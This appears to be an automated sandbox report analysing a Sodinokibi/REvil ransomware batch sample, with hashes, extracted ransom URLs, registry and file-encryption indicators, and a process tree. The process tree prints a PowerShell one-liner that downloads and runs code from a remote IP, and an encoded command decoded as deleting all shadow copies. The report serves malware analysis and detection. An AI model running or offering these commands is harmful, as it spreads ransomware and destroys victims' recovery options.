Analysis

  Max time kernel:   35s
  Max time network:  54s
  Platform:          windows7_x64
  Resource:          win7v200430
  Submitted:         25-05-2020 23:10

  Static task      static1
  Behavioral task  behavioral1   Sample: 57b8d7c9360eb6128db3304dcfb1f349.bat   Resource: win7v200430
  Behavioral task  behavioral2   Sample: 57b8d7c9360eb6128db3304dcfb1f349.bat   Resource: win10v200430
General

  Target:  57b8d7c9360eb6128db3304dcfb1f349.bat
  Size:    216B
  MD5:     289f5081ad9d2578da55acb1a22535d0
  SHA1:    f326802298635d66b7d8bc9c84ee9f9e2dd6b870
  SHA256:  704944436e9ff0dff889481902b320ce73c1479d15bfddadeba11eccc9de1f4c
  SHA512:  5eb166eade908fbbb9d6baacd2cda114d06620644b8082f6f2c2cd5918b2f4d1b18fae626cf6a609014f376c431972a846a22db36dfbb341b5aa025e1fa37e4d
Malware Config

  Extracted:  http://185.103.242.78/pastes/57b8d7c9360eb6128db3304dcfb1f349

  Extracted:  C:\qq5z97o6-readme.txt
    Family:   sodinokibi
    URLs:     http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E9A5298CB4C3D401
              http://decryptor.cc/E9A5298CB4C3D401
Signatures

  Modifies service (2 TTPs, 4 IoCs)
    Processes: vssvc.exe

    Description  IoC                                                                                      Process
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                 vssvc.exe
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                vssvc.exe
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                      vssvc.exe
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe

  Sodin, Sodinokibi, REvil
    Ransomware with advanced anti-analysis and privilege escalation functionality.
  Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
    Processes: powershell.exe

    PID   Process
    1368  powershell.exe
  Suspicious use of WriteProcessMemory (5 IoCs)
    Processes: cmd.exe, powershell.exe

    Description                       PID   Process         Target process
    PID 880 wrote to memory of 1368   880   cmd.exe         powershell.exe
    PID 1368 wrote to memory of 1020  1368  powershell.exe  powershell.exe   (recorded 4 times)
  Suspicious use of AdjustPrivilegeToken (7 IoCs)
    Processes: powershell.exe, powershell.exe, vssvc.exe

    Description                      PID   Process
    Token: SeDebugPrivilege          1368  powershell.exe
    Token: SeDebugPrivilege          1368  powershell.exe
    Token: SeDebugPrivilege          1020  powershell.exe
    Token: SeBackupPrivilege         1840  vssvc.exe
    Token: SeRestorePrivilege        1840  vssvc.exe
    Token: SeAuditPrivilege          1840  vssvc.exe
    Token: SeTakeOwnershipPrivilege  1368  powershell.exe
  Suspicious behavior: EnumeratesProcesses (77 IoCs)
    Processes: powershell.exe, powershell.exe

    PID   Process
    1368  powershell.exe   (75 entries)
    1020  powershell.exe   (2 entries)
  Enumerates connected drives (3 TTPs)

  Blacklisted process makes network request (1 IoC)
    Processes: powershell.exe

    Flow  PID   Process
    1     1368  powershell.exe
  Drops file in Program Files directory (16 IoCs)
    Processes: powershell.exe

    Description                 IoC                                                                                          Process
    File created                \??\c:\program files\qq5z97o6-readme.txt                                                     powershell.exe
    File opened for modification  \??\c:\program files\OutRegister.potx                                                      powershell.exe
    File opened for modification  \??\c:\program files\TraceLock.mov                                                         powershell.exe
    File opened for modification  \??\c:\program files\UnpublishGroup.emz                                                    powershell.exe
    File created                \??\c:\program files\microsoft sql server compact edition\v3.5\qq5z97o6-readme.txt           powershell.exe
    File opened for modification  \??\c:\program files\SyncGrant.mpeg                                                        powershell.exe
    File created                \??\c:\program files (x86)\qq5z97o6-readme.txt                                               powershell.exe
    File opened for modification  \??\c:\program files\EnableCompress.eps                                                    powershell.exe
    File opened for modification  \??\c:\program files\LimitRestore.xlt                                                      powershell.exe
    File created                \??\c:\program files\microsoft sql server compact edition\qq5z97o6-readme.txt                powershell.exe
    File opened for modification  \??\c:\program files\NewResume.vdx                                                         powershell.exe
    File opened for modification  \??\c:\program files\StartConfirm.htm                                                      powershell.exe
    File opened for modification  \??\c:\program files\RedoUpdate.ppt                                                        powershell.exe
    File opened for modification  \??\c:\program files\SaveOut.scf                                                           powershell.exe
    File created                \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\qq5z97o6-readme.txt   powershell.exe
    File opened for modification  \??\c:\program files\SubmitRestart.emz                                                     powershell.exe
  Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
    Processes: powershell.exe

    Description      IoC                                                                                                                                                        Process
    Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\79u32oo.bmp"   powershell.exe
Processes

  C:\Windows\system32\cmd.exe  (PID 880)
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\57b8d7c9360eb6128db3304dcfb1f349.bat"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1368)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/57b8d7c9360eb6128db3304dcfb1f349');Invoke-TJWPIUJAW;Start-Sleep -s 10000"
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
      - Drops file in Program Files directory
      - Sets desktop wallpaper using registry

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1020)
        Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Decoded (the -e argument is base64 of UTF-16LE text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        This deletes every volume shadow copy, which is why vssvc.exe starts and is flagged below; loss of shadow copies removes the easiest local recovery path before encryption.
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses

  C:\Windows\system32\vssvc.exe  (PID 1840)
    Command line: C:\Windows\system32\vssvc.exe
    - Modifies service
    - Suspicious use of AdjustPrivilegeToken